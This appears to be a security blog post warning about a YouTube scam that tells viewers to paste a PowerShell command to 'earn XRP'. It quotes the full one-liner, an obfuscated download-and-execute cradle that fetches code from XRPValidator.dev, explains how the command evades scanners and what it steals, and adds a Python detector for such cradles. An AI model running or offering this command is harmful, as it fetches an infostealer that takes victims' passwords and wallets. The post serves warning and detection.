Found Infostealer In The Wild

Good morning everybody!

Earlier yesterday morning I was doing some research on Nostr and Primal, as I am new to the platform.

I went to YouTube to search for videos and walkthroughs like normal.

I came across this profile, of which I took a screenshot and attached. Yes, I reported this to the YouTube team and to Google.

Below I will cover what I found, TLDR at the bottom.

This is 100% a scam. The technical reality of the XRP Ledger (XRPL) is that validators are not paid. Anyone claiming you can “mine” or earn “daily rewards” by running a node is lying to install malware on your system.

Here is exactly how this social engineering trick works and why you should never “copy-paste” commands from the internet, even from convincing “expert” videos.

  1. The Hook: “Passive Income”

The video uses high-quality production, quotes Satoshi Nakamoto, and shows fake dashboards of “daily rewards.”

The Lie: “Run an XRP node and get paid XRP every day.”

The Truth: The XRP Ledger does not pay validators. Running a node is a voluntary contribution. Any promise of “mining” XRP is a red flag: XRP is pre-mined, so no new coins can be created.

  2. The Weapon: The PowerShell “One-Liner”

The video asks you to paste this command into your terminal. DON'T DO THIS!!!

powershell -command "$Blockchain='XRP'; $NodeType='Validator'; Invoke-RestMethod ($Blockchain + $NodeType + '.' + 'dev') | Invoke-Expression; …"

Why this is dangerous:

  • Obfuscation: By splitting “XRP” and “Validator,” the script tries to hide the target URL (XRPValidator.dev) from basic security filters.

  • Fileless Execution: Invoke-RestMethod downloads a malicious script from the attacker’s server, and Invoke-Expression (IEX) runs it directly in memory. It never touches your hard drive as a .exe, so file-scanning antivirus products have nothing on disk to inspect, and many of them miss it entirely.

  • The “ClickFix” Strategy: Attackers know that if they give you a “quick fix” or an “easy setup,” you’re less likely to scrutinize the code.
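The two tricks above (a download cradle piped into IEX, and a URL assembled from split string pieces) are exactly what a defender can hunt for in PowerShell script block logs. The following is an added example, not code from the original post: it flags the cradle pattern and statically resolves simple `'a' + $var` concatenations to recover the hidden host. The log text and the benign sample are constructed here to mirror the one-liner quoted above (with its truncated tail omitted).

```python
"""Detect PowerShell download cradles (Invoke-RestMethod | IEX) in script
block log text and resolve string concatenations that hide the download host."""
import re

# Constructed samples standing in for ScriptBlock logging text (Event ID 4104).
# The first mirrors the one-liner quoted in the post; the second is harmless.
SAMPLE_MALICIOUS = (
    "$Blockchain='XRP'; $NodeType='Validator'; "
    "Invoke-RestMethod ($Blockchain + $NodeType + '.' + 'dev') | Invoke-Expression"
)
SAMPLE_BENIGN = "Invoke-RestMethod https://status.example.com/api | ConvertTo-Json"

# $Name = 'literal'  (PowerShell variable names are case-insensitive)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*(['\"])(.*?)\2")
# A downloader cmdlet or alias whose output is piped into Invoke-Expression/iex
CRADLE_RE = re.compile(
    r"\b(Invoke-RestMethod|Invoke-WebRequest|irm|iwr|DownloadString)\b"
    r"[^|]*\|\s*(Invoke-Expression|iex)\b", re.I)
# Parenthesised expression containing at least one '+'
CONCAT_RE = re.compile(r"\(([^()]*\+[^()]*)\)")
HOST_RE = re.compile(r"^[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

def resolve_concat(expr, variables):
    """Join '+'-separated string literals and known variables.
    Returns None if any piece cannot be evaluated statically."""
    pieces = []
    for part in (p.strip() for p in expr.split("+")):
        if part.startswith("$"):
            value = variables.get(part[1:].lower())
            if value is None:
                return None
            pieces.append(value)
        elif len(part) >= 2 and part[0] in "'\"" and part[-1] == part[0]:
            pieces.append(part[1:-1])
        else:
            return None
    return "".join(pieces)

def analyze(script):
    """Return the cradle flag, resolved concatenations and any hostnames they yield."""
    variables = {m.group(1).lower(): m.group(3) for m in ASSIGN_RE.finditer(script)}
    resolved = [s for s in (resolve_concat(m.group(1), variables)
                            for m in CONCAT_RE.finditer(script)) if s]
    hosts = [s for s in resolved if HOST_RE.match(s)]
    cradle = CRADLE_RE.search(script) is not None
    return {"cradle": cradle, "resolved": resolved, "hosts": hosts,
            "suspicious": cradle and bool(hosts)}

if __name__ == "__main__":
    for sample in (SAMPLE_MALICIOUS, SAMPLE_BENIGN):
        print(analyze(sample))
```

Run against real 4104 events, the `hosts` list gives you a defanged-ready indicator to block, and the `cradle` flag alone is worth an alert even when the host cannot be resolved statically.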

  3. The Payload: What happens if you hit Enter?

If you run that command, you aren’t a validator; you’re a victim. The script typically:

  • Steals your Identity: Scrapes browser cookies and saved passwords.

  • Drains your Wallets: Searches your files for “seed phrases” or “private keys.”

  • Installs a RAT: Sets up a “Remote Access Trojan” that gives the attacker full control over your mouse, keyboard, and webcam.

Spread the word: In crypto and cybersecurity, if it’s “one click away from easy money,” it’s usually one click away from a complete system compromise.

#CyberSecurity #Infosec #EthicalHacking #XRP #ScamAlert #Nostr

TLDR:

Bad internet shaman say smash one-click PowerShell rune to get free XRP crypto-meat.

XRP cannot be mined, and protocol no pay node runners. Shaman speak fake voodoo.

Rune break words apart to sneak past tribal guard dogs (antivirus) and hide evil sky-cave address (XRPValidator[.]dev).

You hit enter, ghost enter RAM. It no install node; it steal your passwords, drain coin sack, and take over whole cave (RAT).

STAYWIRED!!
